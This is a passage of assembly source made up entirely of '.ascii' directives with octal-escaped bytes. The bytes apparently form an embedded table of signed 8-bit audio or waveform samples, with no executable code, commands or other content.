"\351\350\351\351\347\356\362\350\355\366\356\353\362" .ascii "\361\356\357\356\360\354\345\350\345\331\333\335\324" .ascii "\325\332\330\333\335\337\350\350\342\355\361\347\351" .ascii "\360\354\352\354\357\365\362\364\377\375\371\002\004" .ascii "\001\007\011\012\020\017\021\031\025\025 \035\027\037" .ascii " \032\030\026\027\024\014\017\025\013\011\021\016\013" .ascii "\017\017\022\025\022\030\037\032\035&! (&$$\"\"\033" .ascii "\021\024\017\000\377\002\370\365\367\365\366\362\355" .ascii "\363\357\343\346\350\337\340\345\344\347\351\353\361" .ascii "\360\360\372\367\363\376\002\000\010\016\021\027\025" .ascii "\030 \032\024\036\035\023\025\025\017\013\005\004\002" .ascii "\367\365\370\355\350\355\346\341\345\344\344\347\345" .ascii "\354\362\355\361\374\367\365\374\374\371\365\362\365" .ascii "\357\345\350\351\336\337\343\336\336\340\336\340\340" .ascii "\334\344\346\341\351\357\352\356\365\363\362\360\360" .ascii "\361\352\343\353\345\335\342\347\343\351\354\361\370" .ascii "\370\374\007\010\006\023\024\025\032# &!)$\"\035)\030" .ascii "\026\015\003\346\375&\032\370\335.\007M4\"\375\015'" .ascii "\005/\001\017\377\367\365$\005\012\036Y\003\345\030" .ascii "\340\004\350\276\006\014\213\275\261\327/JN1%\027\007" .ascii "\307\346\352\344\355\340\324\333\341\301\304\272\333" .ascii "\375\000\003\342\345\010\357\316\367\370\336\275\264" .ascii "\267\245\265\254\253\260\300\371\022\363\025!\027\031" .ascii "\355\001\373\344\331\301\333\357\356\373\022\360\000" .ascii "\030\377\015%3\020 $,<?K!\030,7\033\033#\0322KLVP8I" .ascii ";=F4*\022\020\032\023\006\003\364\020\017\370\026\014" .ascii "&>=7=?\"\024\373\336\313\264\260\255\274\307\307\316" .ascii "\327\377\320\270\303\313\331\360\361\331\333\324\343" .ascii "\312\340\331\337\015\335\351\020\021?H15;4\037\037\003" .ascii "\010)\006\005\0310G\"\035'.5.-\020\0348\012\011\037" .ascii "\367\003\375\351\002\002\032\005\376\005\370\023\030" .ascii "\014\030'\020\004\326\346\363\327\341\331\327\306\326" .ascii "\311\252\301\300\334\335\303\370\030\032\374\011\362" .ascii "\332\362\303\301\315\267\267\275\250\311\340\352\371" .ascii "\361\371\371\374\377\365\000\031\012\001\362\376\032" .ascii "%\007\011+1C?@?687\024\031,2\034\030+-6>9BWQdINV::\031" .ascii "3F<;\031\0319+\006\021\027\033\034\015\003\024\021\004" .ascii "\367\342\343\314\306\301\300\277\314\343\321\320\340" .ascii "\332\332\343\315\342\372\333\352\354\357\020\025\371" .ascii "\361\370\002\372\351\371\363\013\000\354\347\360\371" .ascii "\327\335\320\322\355\325\313\311\330\364\325\353\004" .ascii "\012\036\035\026\002!!\002\365\367\370\022\371\351\371" .ascii "\360\006\362\367\004\0324(\026\034\030\035\034\364\365" .ascii "\016\007\376\014\025\017\024 \025+-,\035\367\367\002" .ascii "\362\342\357\337\353\000\344\320\351\365\010\373\371" .ascii "\023\022\"\010\373\001\375\376\371\326\341\362\327\341" .ascii "\317\324\357\361\356\360\006\023\030\014\003\016\017" .ascii "\015\007\375\366\011\000\343\355\355\360\373\010\014" .ascii "/@HM4??/&\022\022\016\004\377\361\376\026\024\014\364" .ascii "\360\362\375\003\357\017#\033\030\033)'\021\021\023" .ascii "\034&46>a`TR;7: \016\012\010\003\371\352\345\356\007" .ascii "\355\355\000\375\004\000\367\367\377\001\363\343\324" .ascii "\312\321\276\264\253\261\312\307\275\327\337\345\356" .ascii "\353\327\344\367\321\325\325\310\330\312\257\271\262" .ascii "\273\300\265\262\302\340\341\335\370\011\012\005\357" .ascii "\351\363\357\326\316\324\340\352\355\366\010\015\033" .ascii "\015\012\033\027 \035\023\014\015\023\005\004\025\026" .ascii "*.%9EEF>LKMB(,-%\034\034\022!+!!685A5>IFB@?@<!\032\033" .ascii "\024\036\021\371\014\016\010\006\367\006\010\372\341" .ascii "\276\273\273\270\305\304\306\336\333\324\350\363\374" .ascii "\000\374\370\007\011\007\377\364\376\366\360\351\340" .ascii "\334\353\355\347\341\376\372\356\370\347\365\375\355" .ascii "\334\320\300\320\314\266\275\307\320\306\313\326\351" .ascii "\005\371\364\367\004\004\370\355\341\344\360\352\334" .ascii "\341\352\364\344\355\371\005\013\007\375\363\010\021" .ascii "\364\362\370\367\006\370\007\016\027&\032\021\031\035" .ascii "\037\033\003\010\007\014\012\377\002\014\022\376\006" .ascii "\023\031\035\034\026%26:,:=5\"\037\020\007\017\370\357" .ascii "\375\374\004\017\375\011 (% \"$\035\026\374\001\021" .ascii "\000\363\357\355\361\376\365\367\014\026\037\032\014" .ascii "\014\012\377\367\344\337\360\350\330\321\325\330\321" .ascii "\306\274\300\310\314\327\307\333\355\336\324\320\336" .ascii "\337\343\336\343\354\001\022\031\"/<?6((.\031\377\367" .ascii "\373\374\353\347\334\343\346\357\353\352\007\004\004" .ascii "\016\012\023\031\010\007\005\004\007\007\370\354\364" .ascii "\003\365\370\003\000\011\015\000\376\014\007\000\003" .ascii "\371\377\007\371\365\355\361\362\357\357\003\012\012" .ascii "\031\026\012\030\032\003\371\350\343\355\334\316\341" .ascii "\343\351\355\365\000\012\032\027\023\032\033\036\032" .ascii "\006\005\007\000\364\365\357\360\370\371\375\006\015" .ascii "\033\021\007\023\027\023\006\020\377\374\003\355\363" .ascii "\356\350\366\362\353\373\000\003\003\376\014\014\020" .ascii "\026\016\021\022\013\377\370\375\372\374" .ascii "\367\361\377\004\373\367\356\346\327\325\317\273\272" .ascii "\277\306\276\310\336\340\355\367\370\012\022\032$!," .ascii "2/2\"*#\022\021\004\015\021\020\015\015\021\026\031" .ascii "\035\011\021\035\024\024\016\021\003\375\364\364\365" .ascii "\364\372\371\355\374\003\000\003\375\012\011\377\003" .ascii "\003\004\000\374\374\364\376\003\000\001\002\001\006" .ascii "\377\364\367\370\354\345\354\351\346\345\346\342\345" .ascii "\356\373\360\361\367\366\372\371\376\366\377\001\376" .ascii "\000\370\363\372\356\345\361\355\363\372\366\002\006" .ascii "\010\015\025\031\027\037\027\015\016\013\006\375\371" .ascii "\001\376\371\000\001\372\372\376\372\371\377\002\000" .ascii "\367\367\373\372\375\370\376\005\005\032\030\023\037" .ascii "\032\033\024\011\012\010\372\364\352\345\342\335\334" .ascii "\325\322\314\317\315\305\320\331\325\335\352\363\370" .ascii "\373\377\376\373\376\004\374\002\016\022\033\031\035" .ascii "*#\037%!$$\035\033\016\017\013\007\011\374\376\002\366" .ascii "\363\377\373\371\002\377\373\377\007\005\375\366\372" .ascii "\377\365\374\000\001\374\377\002\375\013\003\006\013" .ascii "\373\004\011\374\374\372\362\364\361\357\355\353\353" .ascii "\355\365\367\372\012\013\011\011\011\006\371\363\356" .ascii "\350\335\342\347\345\360\365\363\372\002\010\022\027" .ascii "\032\033!\032\035!\027\023\033\025\017\021\017\021\010" .ascii "\003\011\014\011\014\013\013\011\010\007\013\007\006" .ascii "\015\011\005\012\015\007\010\012\007\013\016\013\015" .ascii "\013\015\016\010\005\001\377\374\360\361\364\355\361" .ascii "\363\361\364\363\363\361\347\343\331\322\311\301\304" .ascii "\305\300\276\307\306\307\326\332\333\355\367\000\015" .ascii "\016\030\037\033\034\037\036\026\026\016\011\005\377" .ascii "\003\373\361\367\366\357\366\360\360\363\353\351\352" .ascii "\357\353\355\362\350\356\366\364\366\375\003\375\375" .ascii "\377\375\373\366\364\356\346\355\353\352\353\350\354" .ascii "\362\370\365\377\005\376\004\010\376\003\006\371\377" .ascii "\372\370\374\365\361\363\361\355\355\357\363\364\370" .ascii "\372\001\000\012\023\024\030\034!\036#%\036!\"\"&\"" .ascii "(*'&&)*### !\035\"\037\035$!!$$#\035\035\037\033\031" .ascii "\026\033\025\021\025\021\021\024\025\033\034\033!!\037" .ascii "\033\027\023\020\017\007\002\365\354\354\337\322\316" .ascii "\307\303\302\302\312\316\320\331\343\346\350\367\372" .ascii "\365\377\001\376\002\005\012\010\013\014\011\012\005" .ascii "\005\000\367\370\365\362\363\356\356\355\353\347\352" .ascii "\352\347\354\347\341\351\343\342\345\334\332\334\327" .ascii "\325\330\324\315\321\325\322\327\330\336\337\336\346" .ascii "\347\350\352\356\353\355\355\352\350\344\331\325\326" .ascii "\316\320\321\321\317\323\333\333\336\342\342\346\346" .ascii "\350\356\350\352\363\357\363\365\372\377\001\003\003" .ascii "\007\005\013\017\020\022\027\025\031\031\031\037\034" .ascii " &'&'*'*)))(* 4\026% \356\023\002\027 \026-\036\026" .ascii "\023\0376 \0174+G;\037$6G\020&\030\005.\024\010\"\015" .ascii "\002\364\353\343\337\355\364\355\361\355\355\026\365" .ascii "\372\005\357\356\011\031\376\006(&&5<6!2$/$\033!\015" .ascii "\037\022\0341\020\026\030\354\370\372\341\350\351\333" .ascii "\341\341\355\341\340\333\325\361\341\360\373\003\000" .ascii "\362\001\374\363\364\366\374\360\366\375\366\364\354" .ascii "\364\364\363\373\367\364\357\324\333\320\315\356\330" .ascii "\324\336\316\314\275\263\274\310\310\313\337\342\340" .ascii "\347\350\337\344\367\013\013\016 \026\023#\033\030\034" .ascii "\034\030\035(\024\022\000\364\371\362\002\363\367\373" .ascii "\352\356\365\345\364\366\366\007\007\032\015\014\014" .ascii "\012\011\020\031\034 \035\031\031\021\374\013\014\013" .ascii "\025\023\031\007\003\003\363\350\355\364\345\344\336" .ascii "\313\304\271\260\304\274\276\316\317\325\331\334\343" .ascii "\351\355\002\012\036\037(3 '*-1181)!\025\002\365\375" .ascii "\354\353\367\363\354\345\340\336\336\343\350\360\374" .ascii "\364\000\001\363\374\377\377\013\010\016\017\004\002" .ascii "\377\371\364\377\005\010\011\010\005\374\364\373\367" .ascii "\360\363\372\366\363\362\347\334\332\330\331\342\343" .ascii "\353\347\347\347\340\346\351\355\376\005\014\031\030" .ascii "\030\031\033\"%-324%$\037\032\030\032\034\031\037\034" .ascii "\026\016\010\010\012\017\032$$$'\"\035\037$$++.3#'!" .ascii "\030\037\"(0/*,#\032\035\036\027\032\033\021\013\000" .ascii "\370\360\347\346\350\346\345\350\337\325\322\320\321" .ascii "\327\340\353\366\367\000\003\003\006\011\025\025\036" .ascii "*%&\037\025\023\013\007\011\010\005\000\373\366\360" .ascii "\354\356\360\362\374\003\376\374\377\366\362\363\367" .ascii "\373\375\376\374\371\361\357\353\350\355\356\361\370" .ascii "\363\361\357\344\343\345\344\345\351\353\346\342\333" .ascii "\326\323\315\317\325\322\323\326\322\316\314\316\316" .ascii "\324\332\343\351\345\347\346\340\343\350\352\357\366" .ascii "\374\373\367\363\360\356\352\355\364\364\365\367\362" .ascii "\360\360\355\365\374\377\011\017\017\020\022\016\015" .ascii "\020\023\031\031\033\034\024\016\016\014\010\015\022" .ascii "\024\025\021\016\013\004\002\004\003\007\011\012\010" .ascii "\000\374\367\362\363\365\371\373\374\374\367\363\360" .ascii "\357\360\361\362\367\366\357\354\351\342\341\346\351" .ascii "\355\361\365\365\360\356\357\357\361\370\377\002\007" .ascii "\011\006\005\002\003\013\014\021\033\031\026\025\022" .ascii "\015\014\015\020\024\023\023\023\013\005\003\377\377" .ascii "\004\006\012\011\005\002\376\367\366\371\366\370\372" .ascii "\366\361\353\345\342\337\341\347\354\357\363\365\361" .ascii "\360\362\365\372\000\005\013\015\010\007\003\375\375" .ascii "\376\377\377\377\373\366\353\345\343\337\337\346\353" .ascii "\355\361\363\364\364\366\375\007\016\027\"%&'%%(+24" .ascii "451)&$!#(+-*%#\034\026\027\031\031\032\032\027\021\013" .ascii "\006\004\002\004\014\017\021\024\022\016\016\017\022" .ascii "\030\035\"'$\036\035\026\017\015\014\011\006\377\371" .ascii "\357\342\332\327\322\324\332\334\340\342\341\343\345" .ascii "\350\363\376\006\022\034\035\037 \037\037\"&+,)(\"\031" .ascii "\025\022\021\022\023\024\022\015\005\000\370\363\364" .ascii "\364\363\364\362\355\347\340\334\333\333\337\347\350" .ascii "\351\354\352\350\351\354\362\371\376\006\012\007\004" .ascii "\003\376\373\375\375\375\373\366\361\347\333\326\322" .ascii "\315\317\321\316\315\313\307\306\306\310\322\333\342" .ascii "\354\364\365\367\372\375\002\007\016\027\032\032\035" .ascii "\032\025\026\027\030\035\037 \037\032\024\021\013\007" .ascii "\012\011\007\006\003\375\367\360\356\356\355\361\367" .ascii "\367\370\372\372\372\375\001\010\021\024\032\035\032" .ascii "\030\027\024\022\023\023\020\014\005\377\364\350\343" .ascii "\335\325\322\320\312\306\301\276\275\276\300\311\321" .ascii "\327\340\347\352\356\363\370\000\006\015\025\026\030" .ascii "\032\027\023\025\025\025\027\030\027\025\016\012\010" .ascii "\002\377\000\377\373\370\364\356\351\343\341\341\337" .ascii "\342\345\344\344\345\344\345\350\354\361\367\371\376" .ascii "\001\376\377\001\377\000\002\004\003\000\374\371\362" .ascii "\352\350\346\341\340\336\332\327\323\320\320\316\316" .ascii "\324\327\327\334\336\336\340\344\350\355\363\371\000" .ascii "\002\005\012\013\013\020\024\027\033\035\037 \034\033" .ascii "\034\031\030\032\031\027\025\022\015\012\007\007\007" .ascii "\006\010\013\011\011\013\012\013\015\020\025\030\031" .ascii "\035\037\034\034\036\036\036\037\037\037\034\030\025" .ascii "\021\014\012\010\005\004\002\375\372\365\361\357\353" .ascii "\347\351\347\343\344\343\340\340\342\344\351\354\361" .ascii "\370\373\375\004\010\014\022\030\035#%(*'&'#!\"\037" .ascii "\032\027\022\015\011\004\003\003\000\377\001\377\375" .ascii "\376\377\377\001\003\010\013\012\014\016\013\013\014" .ascii "\013\013\013\011\010\005\001\000\375\371\371\371\367" .ascii "\367\370\366\365\363\363\364\363\362\366\366\363\363" .ascii "\363\357\355\354\353\354\353\352\354\353\352\355\357" .ascii "\361\366\373\377\004\010\015\021\022\024\032\033\033" .ascii "\037 \036\036\035\033\032\027\026\027\025\024\025\024" .ascii "\022\023\023\025\026\027\033\035\034\036\037\035\035" .ascii "\037\036\035\035\034\032\030\024\023\021\015\014\015" .ascii "\013\011\011\010\007\005\004\006\006\004\006\007\003" .ascii "\002\000\374\371\365\361\357\353\347\346\344\340\341" .ascii "\342\342\345\351\355\361\365\372\377\002\005\014\020" .ascii "\021\026\030\030\030\027\026\026\023\022\023\021\015" .ascii "\016\014\011\011\010\007\010\007\010\010\006\006\006" .ascii "\004\002\003\002\000\377\375\374\373\366\365\365\361" .ascii "\360\362\361\357\357\357\357\360\360\362\364\363\365" .ascii "\367\366\365\365\363\362\361\357\356\354\350\350\346" .ascii "\340\337\340\335\334\336\337\337\340\341\344\346\347" .ascii "\354\360\362\365\370\372\375\376\000\003\004\005\011" .ascii "\013\012\016\017\017\021\022\024\025\026\027\031\027" .ascii "\026\027\026\023\023\022\020\016\013\011\007\003\000" .ascii "\001\376" .ascii "\374\375\375\374\375\375\376\377\000\002\005\005\006" .ascii "\011\010\007\007\006\005\003\000\377\374\367\364\361" .ascii "\353\346\344\340\334\332\330\327\327\324\326\331\331" .ascii "\334\341\344\347\354\357\363\366\371\376\001\002\006" .ascii "\011\010\012\015\014\015\017\017\020\020\017\021\021" .ascii "\015\015\016\012\010\007\005\002\376\373\371\365\361" .ascii "\360\356\353\353\352\350\350\351\351\352\353\354\360" .ascii "\361\361\364\366\365\367\371\371\371\370\370\370\365" .ascii "\363\362\360\354\353\351\347\345\342\340\337\334\332" .ascii "\333\331\327\331\331\330\332\334\335\340\343\346\353" .ascii "\355\361\367\371\374\001\005\010\013\016\022\025\025" .ascii "\030\033\031\031\033\032\031\030\027\025\023\021\017" .ascii "\015\012\007\010\005\003\003\001\000\000\000\001\002" .ascii "\001\004\006\004\006\012\011\011\012\013\013\013\012" .ascii "\013\013\010\007\007\005\003\002\000\375\372\367\364" .ascii "\360\353\351\345\340\336\335\331\327\327\327\330\331" .ascii "\333\340\344\346\355\363\367\375\004\011\015\021\026" .ascii "\033\034\036!!\037 \037\034\032\030\025\022\016\013" .ascii "\011\005\001\001\377\373\373\372\371\370\371\371\372" .ascii "\371\373\375\374\373\376\376\376\375\376\375\376\374" .ascii "\373\373\367\365\364\363\356\364\354\344\342\375\006" .ascii "\376\300\313\006\355\357\377'\345\021>\027\"!\375\022" .ascii "@\345\016\016\016Ij\364\355(\321\335\0242\343\026\025" .ascii "\017\363\013N;I$\374\336\303\302\354\324\345\347\350" .ascii "\363\371\352\317\352\364\346\361\377\370\326\306\301" .ascii "\253\261\311\305\260\310\323\327\313\327\266\327\332" .ascii "\271\340\315\337\333\311\262\274\313\351\337\351\363" .ascii "\341\002\344\355\017\021\026&\033%'\025\000\345\364" .ascii "\375\367\362\007\025!70/5QOAWefO:%.++\025\011\033\014" .ascii "\014\371\365\375\360\366\356\336\362\367\353\352\341" .ascii "\337\345\353\326\330\355\356\002\357\365\006\001\366" .ascii "\356\360\345\363\356\321\313\331\330\337\322\332\366" .ascii "\362\362\370\000\024\034\022\012\001\024\033\017\007" .ascii "\002\020\025\024\024\0350357?ORUM@KL4\036(0'&\031%>" .ascii "=53<XbWPDC/\033\021\014\012\010\362\345\352\352\362" .ascii "\351\341\345\364\365\351\337\341\345\345\330\316\307" .ascii "\271\257\242\242\267\322\327\332\332\345\372\364\343" .ascii "\337\334\332\326\311\305\315\341\346\334\343\371\013" .ascii "\030\026\0367HMD</0)\016\011\015\022\015\373\374\012" .ascii "\022\030\033\032#4- \031\027\032\023\376\377\006\007" .ascii "\001\365\372\006\023\027\022\013\030\026\021\005\374" .ascii "\003\002\364\336\334\337\336\332\315\313\334\351\354" .ascii "\344\345\356\364\350\331\331\332\336\323\300\271\276" .ascii "\276\273\266\273\323\342\345\341\345\361\354\337\315" .ascii "\305\317\314\276\267\266\301\316\314\313\335\370\012" .ascii "\031\"-96,\036\025\033\027\002\364\361\367\364\354\344" .ascii "\355\005\014\025\034':@7.-2/!\032\037,.%#)7;948B@.!" .ascii "#%\034\015\005\003\014\020\006\001\013\034\036\027\027" .ascii "\036,#\021\012\006\012\002\361\347\345\353\350\335\335" .ascii "\351\367\375\367\366\003\015\007\374\365\370\373\365" .ascii "\344\335\343\354\357\353\366\017\"$\036\032 &\035\014" .ascii "\004\002\001\367\343\333\341\350\344\337\345\367\007" .ascii "\017\013\020\037$\033\003\357\354\353\341\331\340\360" .ascii "\376\004\004\016\"03-1@E>2034)\030\026\036%%\"-AF@5" .ascii "085&\024\014\013\004\362\342\334\341\343\332\321\325" .ascii "\343\350\341\332\337\350\353\342\324\321\325\321\302" .ascii "\266\267\300\301\270\264\275\315\324\322\320\330\345" .ascii "\345\332\316\315\323\316\276\266\272\304\310\302\301" .ascii "\315\337\351\352\352\365\004\003\367\355\360\366\361" .ascii "\344\336\344\355\357\350\343\354\371\373\365\364\376" .ascii "\015\015\003\002\011\021\022\012\010\025%)#\",88-)1" .ascii "4+\033\015\015\014\001\362\353\364\000\002\375\003\023" .ascii "!$\036\037+3/$\036\037!\025\001\373\000\005\001\370" .ascii "\373\011\022\023\015\016\032\"\033\015\007\012\012\374" .ascii "\351\344\352\353\350\341\343\362\376\376\372\377\015" .ascii "\026\015\000\376\002\000\364\347\344\354\361\356\346" .ascii "\354\374\010\006\002\013\030\035\027\016\017\032\036" .ascii "\030\021\023\035 \026\014\020\033\037\031\022\025\036" .ascii "\036\023\006\001\006\005\367\354\357\372\376\370\363" .ascii "\372\005\004\372\362\366\006\015\007\004\014\026\027" .ascii "\013\003\007\020\021\013\011\023%,**4BD:4:@>3))-&\030" .ascii "\016\022\033\031\016\007\016\024\017\377\364\362\362" .ascii "\350\327\314\315\323\320\306\305\322\337\342\334\333" .ascii "\345\356\350\334\323\323\325\313\273\264\272\300\277" .ascii "\270\272\310\325\330\325\327\341\352\350\333\326\331" .ascii "\332\322\302\276\304\311\305\277\301\315\332\334\332" .ascii "\337\355\367\365\354\353\360\357\343\327\321\324\327" .ascii "\322\315\322\337\355\361\361\373\013\027\030\024\027" .ascii "\036\037\026\013\006\010\012\003\372\375\006\013\011" .ascii "\006\012\024\030\024\021\022\030\033\025\016\020\027" .ascii "\033\032\030!/789=DG?6440%\031\030\033\032\025\023\030" .ascii "#('(+24+\"!\"\034\021\011\007\012\011\004\003\007\016" .ascii "\022\017\015\022\030\026\020\011\012\012\004\374\365" .ascii "\365\367\370\363\362\372\003\007\011\014\025\035\034" .ascii "\027\021\016\012\002\364\352\347\346\342\334\331\337" .ascii "\346\346\346\351\356\363\363\354\350\347\345\335\317" .ascii "\304\277\273\264\260\263\275\312\323\333\345\361\374" .ascii "\001\001\002\011\013\010\004\003\007\013\014\014\021" .ascii "\032#)-3=CB=972'\035\027\024\022\016\011\011\016\022" .ascii "\021\017\020\024\025\017\012\007\005\003\376\367\365" .ascii "\366\370\366\364\366\376\003\003\003\007\013\014\011" .ascii "\004\003\002\377\372\362\357\361\357\355\353\356\363" .ascii "\367\367\367\372\376\377\374\370\364\364\360\350\341" .ascii "\337\337\337\335\335\342\347\353\354\354\355\360\357" .ascii "\351\343\337\335\330\321\315\315\316\317\321\323\332" .ascii "\343\351\354\356\362\365\364\355\351\346\341\333\324" .ascii "\316\313\313\313\313\314\322\334\342\346\355\365\372" .ascii "\376\376\375\376\376\374\371\367\366\372\372\370\373" .ascii "\000\005\011\012\016\024\027\030\027\025\024\025\023" .ascii "\016\014\014\015\014\012\013\020\022\024\026\030\033" .ascii " \036\035\036\037\035\030\027\030\030\030\031\031\035" .ascii "\"#%&)++'&&$\" \037\"%'*/4:;:;<94.(#\035\026\017\012" .ascii "\006\005\003\000\001\004\006\007\006\005\006\002\373" .ascii "\364\356\351\346\342\337\342\345\351\355\360\367\377" .ascii "\003\010\015\021\025\030\031\030\030\031\031\030\025" .ascii "\030\032\034\036 \"&'$# \036\032\023\013\006\001\372" .ascii "\363\355\351\346\343\341\340\340\341\344\344\343\346" .ascii "\350\347\345\343\341\337\333\326\323\321\316\315\314" .ascii "\314\316\321\324\326\327\332\336\335\334\334\333\332" .ascii "\330\325\323\322\322\322\322\321\323\327\327\330\332" .ascii "\334\334\335\334\333\334\333\334\333\332\333\335\334" .ascii "\334\335\336\340\340\340\340\342\342\342\342\340\342" .ascii "\344\343\343\345\350\352\354\355\360\364\365\367\370" .ascii "\370\371\372\370\366\365\364\364\363\363\365\370\372" .ascii "\376\003\007\015\024\030\033 %())++*('&&&%&'),,-012" .ascii "110.-*)&&&%%')*+,-.-+*'$# \035\033\033\033\034\034\036" .ascii "!\"%&'(**)(('%\"!\037\033\030\026\023\021\020\016\014" .ascii "\012\011\007\005\001\000\375\371\365\363\360\355\351" .ascii "\345\342\335\332\327\324\320\320\320\320\322\324\327" .ascii "\332\334\337\343\346\351\356\361\364\370\375\000\003" .ascii "\006\011\014\014\015\017\020\017\020\017\015\014\012" .ascii "\010\006\003\003\002\377\375\374\373\371\366\363\360" .ascii "\354\351\346\343\337\335\334\332\331\332\333\334\335" .ascii "\336\337\341\340\340\340\336\336\335\334\332\332\332" .ascii "\332\333\333\335\336\337\342\343\344\345\347\346\346" .ascii "\346\346\345\344\343\343\343\342\342\343\344\345\350" .ascii "\351\353\355\360\361\362\361\362\361\360\354\350\344" .ascii "\344\342\342\343\344\347\353\356\361\371\375\001\002" .ascii "\010\005\012\006\013\005\007\374\003\013\026\003\366" .ascii "\374\340;\016\307\005'\005!\367\362;\346\372\031\350" .ascii "\367\020\346\016\025$C\001\021\006\306\033%\017\035" .ascii "\371\024\275\241\322\240\301\374\3555\025\377\015-\346" .ascii "\343\037\335\011\354\"\310\316\350\331\316\277\362\311" .ascii "\323\354(\364\033$\324\354\373%G\0370\023\032\"\332" .ascii "\365\021\311\374\356\324\025\265" .ascii "\335\347\330\354& \023.\3739!\0203P>G*\005\035\372\366" .ascii "\323\005\007\026\037\337\353\302\256\350\325\365\363" .ascii "\325\022\345\377\032\375\004&1aDD/\002\023\003C\022" .ascii "\373&\012\363\374\312\366\351\273\335\371\006\006\030" .ascii "\005(\027\035+-EH=*EN\"\026\025\026\372\001\007\006" .ascii "!\354\026\033#\033\370\025\006$\014\030\377\343\012" .ascii "\012\026\015\022\000\366\350\341\343\352\310\302\340" .ascii "\314\022\005\342?\017\345\031\377\367\364\001\012\365" .ascii "\377\337\001\030\351\367\031\"\0162#\003\015.#<&\017" .ascii "\021\350)222\036\307\331\000\322\336\363\270\313\325" .ascii "\252\325\312\307\307\325\330\367\364\036\377\367\024" .ascii "\016,$\004\003 \366\363\006\000\273\341\334\304\321" .ascii "\327\331\332\346\311\320\352\354\362\002\351!\015\011" .ascii "$\371\025\374\361\375\365\007\357\014\372\373\037\035" .ascii "\001\012\007\357/\362\372\367\327\354\353\004\343\357" .ascii "\361\350\366\023\010\035\014\335\026\005\011\024&\015" .ascii ")\004\376G\021'5\024\026\036%G\375\021\"\015\013\343" .ascii "\012\374\320\340\352\360\346\365\007\005\0061\"#J5C" .ascii "\037W8',3/$:\010%\000\342\355\011\001(\025\011*\352" .ascii "\021\020\000\"\003\025\034\023\030\004\013(\033\035" .ascii "\036\021\004\347\006\320\312\322\274\321\322\322\363" .ascii "\017\373\365\321\001\023\357\006\034\003\351\011\015" .ascii "\000\021\006\007\0131(0+\372\037\007\002'L\030\016-" .ascii "&\035-(\006\026\001\000\372\342\373\330\257\322\265" .ascii "\312\272\305\315\316\333\313\012\364\362\021\014\366" .ascii "\025!\010\365\352\371$ \353\004\350\363\357\373\363" .ascii "\346\356\322\335\327\000\341\326\363\372\374\376\374" .ascii "\357\351\354\320\314\327\313\330\342\343\343\001\026" .ascii "\001\377\371\377%(=C\036\372\012\375\037\027\007\020" .ascii "\367\365\373\005\356\016\345\273\336\011\007\370\376" .ascii "\342\320\360\014\036\037\026\024\0352,95=\014 9\030" .ascii ")\032\027\002!)\026\027\007\010\007\006\0324\022\033" .ascii "(\034\023\0040!\013\375\377\021\367\002\010\362\351" .ascii "\003\012\013\013\027 )7.7\027\0218(483\025\372\006\006" .ascii "\023\376\370\350\330\275\316\262\242\266\257\317\321" .ascii "\341\006\010\343\367\362\375\006\012\024\013\015\033" .ascii "%\036\030\034*/(#9\003\005\026\010\037\033\032\027\017" .ascii "\024\023\025\021\017\007\360\356\360\354\305\315\267" .ascii "\242\306\263\304\331\310\277\324\331\332\352\356\361" .ascii "\364\023\011\021\016\371\011\364\353'\003\357\026\337" .ascii "\350\337\344\374\343\340\343\344\371\347\372\364\341" .ascii "\360\370\011\373\353\325\326\275\315\331\326\302\307" .ascii "\334\326\346\360\360\371\351\357\375\374\005\371\010" .ascii "\370\367\010'5\016\004*\027\035/\022\005\001\011\374" .ascii "\377\004\366\364\357\365\361\355\023\012\016\003\021" .ascii "\026\034\"\373\002\002\036\027\030\011\360\377\001\003" .ascii "\023\020\010$\032\0152:06+,;AG<\"8($9\035\010\007\005" .ascii "\364\023\377\366\005\345\377\026\013\007\356\364\360" .ascii "\374\030\026\020\366\353\364\367\005\005\336\344\331" .ascii "\312\315\326\324\270\273\316\344\372\017\033\015\013" .ascii "\0332:33/'%\037##\007\016\005\004\013\001\002\003\353" .ascii "\363\362\372\352\330\006\346\371\001\352\374\365\345" .ascii "\356\367\355\370\357\350\341\324\353\353\364\361\354" .ascii "\335\370\000\357\014\364\353\377\025\025!\033\011\004" .ascii "\371\354\346\356\342\305\313\304\313\320\316\304\256" .ascii "\304\313\346\332\330\354\346\354\362\366\003\370\356" .ascii "\353\345\342\363\363\342\367\000\365\364\364\005\377" .ascii "\373\006\375\026\013\011\370\020\026\012\032\025\021" .ascii "\004\023\016\012\021\005\362\000\361\357\365\363\357" .ascii "\362\365\376\003\002\015\023\010\005#\015\026\024\004" .ascii "\017\031\034\021\033\014\007\012\010\377\014\011\023" .ascii " \015- +1 0)LB%)!+%\025\033\036\003\015\015\015\013" .ascii "\016\015\007\010\371\032\006\022\005\356\012\357\360" .ascii "\002\003\377\364\375\353\340\353\326\306\304\303\273" .ascii "\277\277\310\321\320\341\000\013\375\013\023$!\0352" .ascii "\032'0-5/2+\026\035\030\013\030\015\010\015\010\003" .ascii "\007\367\362\374\373\005\375\356\367\360\340\341\350" .ascii "\334\311\336\316\305\324\315\325\302\304\332\325\337" .ascii "\351\364\351\366\005\374\005\016\015\004\013\375\015" .ascii "\002\376\370\364\342\340\354\344\367\337\344\362\362" .ascii "\355\000\360\360\367\366\367\352\366\354\345\332\320" .ascii "\332\323\332\321\314\315\320\333\326\334\331\334\311" .ascii "\335\342\342\361\350\355\347\370\005\000\010\005\374" .ascii "\012\022\016\017\020\022\016\013\012\023\032\024,!+" .ascii "4+5$/A:(2,+##\037\015\032\023\005\005\376\004\376\000" .ascii "\000\376\004\372\027\020\012\013\017\012\012\015\027" .ascii "\033\003\017\013\002\376\020\000\001\017\013\024\025" .ascii "\014\030\032\024\036\036#\027\035%\030\033\035\014\030" .ascii "\004\022\012\367\374\325\333\330\317\306\336\327\317" .ascii "\351\357\351\363\003\373\002\010\020\010\017\017\016" .ascii "\015\011\024\007\014\013\023\006\003\004\373\002\365" .ascii "\367\360\367\376\372\004\371\365\005\372\377\374\373" .ascii "\011\364\362\367\352\346\350\353\341\352\343\343\353" .ascii "\350\364\356\365\003\010\010\023\376\010\001\373\006" .ascii "\377\007\356\363\370\350\335\347\342\331\337\334\336" .ascii "\335\334\340\351\343\354\355\344\354\356\355\354\340" .ascii "\330\340\336\332\321\323\326\312\324\322\337\345\317" .ascii "\335\342\333\345\344\353\367\357\357\371\377\004\010" .ascii "\006\014\022\017\015\030\026\027\032\024\014\007\031" .ascii "\025\024\031 $%-/#/6&5+.,\035\031\024\025\007\003\010" .ascii "\003\375\377\375\004\000\370\010\013\007\014\026\022" .ascii "\003\020\031\026\023\377\012\021\006\017\004\000\001" .ascii "\377\004\013\011\003\016\007\006\024\014\020\030\025" .ascii "\027\022\024\026\016\021\021\006\374\365\367\365\342" .ascii 